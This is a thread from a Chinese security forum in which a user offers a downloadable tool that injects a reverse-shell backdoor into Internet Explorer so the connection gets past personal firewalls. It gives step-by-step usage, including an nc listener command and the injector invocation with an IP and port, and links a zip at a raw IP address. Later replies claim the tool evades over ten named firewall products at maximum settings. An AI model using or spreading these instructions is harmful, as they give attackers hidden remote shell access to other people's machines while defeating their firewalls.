|
 | 作者: wineggdrop [wineggdrop]
 论坛用户 |
登录 |
| 这是一个测试突破防火墙得到一个Shell的程序。 前提条件,你需要两台系统(一台都可以,但为了更为真实,两台系统会好些),监视连接的那台系统需要 有独立的IP(直接连上internet)的,另外一台系统是装有防火墙的,因为测试的是将后门插入到IE中运行 的,所以防火墙要允许IE连接网络的(实际情况中,管理员一样会允许IE连接网络的). 用法: 1.在将有防火墙的那台系统中,将Inject.exe和IE.dll解压到同一个目录中去,在cmd下你当前目录转移 到那个存在Inject.exe和IE.Dl的目录中去。 2.在接收连接的那台系统(有独立IP的那台系统,假设IP为12.12.12.12),连接nc监听一个端口 nc -l -p 6669 3.在装了防火墙的那台系统中,运行Inject.exe IE.Dll 12.12.12.12 6669 4.如果成功,那么那台运行了NC监听一个端口的系统就会得到一个cmd下的反向shell了。 上面的端口6669是可以随个人喜欢改变的,但当然是要合法的端口,至于那个12.12.12.12的IP,那在实 际测试中是那台运行了NC的那系统的IP。 程序只是写于用来测试突破防火墙的限制的,所以并不是什么黑客工具来的,因为我的测试中全部成功 的,所以如果有什么问题或者不会用等的问题,我是不作任何回答的,因为程序只是留给想测试防火墙 的性能并知道如何操作的朋友去用的,如果你看不明白上面的用法的话,那么最好就不用试了。 211.93.112.71/ByPassFireWall.zip |
| 地主 发表时间: 03/03 05:06 |
 | 回复: ricky [ricky]  版主 |
登录 |
|
晕,就是端口反弹,我看了半天,你要用80端口就更保险了 |
| B1层 发表时间: 03/03 14:07 |
| 回复: wineggdrop [wineggdrop] 论坛用户 |
登录 |
|
测试超过10个防火墙 金山毒镖,zonealarm,blackice,sygate,norton internet firewall,mcafee firewall,瑞星防火墙,KFW,江民反黑王,绿色警戒等,安全 设置全为最高,只要允许IE连接网络,就无法检测出来, 根本不需要用80端口,谁测试过有什么防火墙可以拦住的话请 跟贴。 |
| B2层 发表时间: 03/05 03:23 |
| 回复: ricky [ricky] 版主 |
登录 |
|
你试试天网 |
| B3层 发表时间: 03/05 09:32 |
| 回复: wineggdrop [wineggdrop] 论坛用户 |
登录 |
|
天网当然是试过了,天网是我测试的十几种防火墙中的其中一种,虽然 我没有列出来。天网远远比不上zonealarm和sygate这两个防火墙。程序 并不是简单的一般反向连接,如果你用nc还是什么的简单的反向连接 是肯定会被防火墙拦住的,只要是那些授 权让程序连接网络的防火墙 就会弹出警告询问是否让nc连接网络,现在测试的程序是将反向连接 的代码放到IE中运行,你在进程中看到的是IE在尝试连接网络,防火墙 一样认为是IE在尝试连接网络,我就没有见过会设置防火墙不允许IE连接网络的(除非他不看网页或者用其它的浏览器去看网页). |
| B4层 发表时间: 03/05 12:51 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 原创软件
标题: 突破防火墙得到一个Shell的程序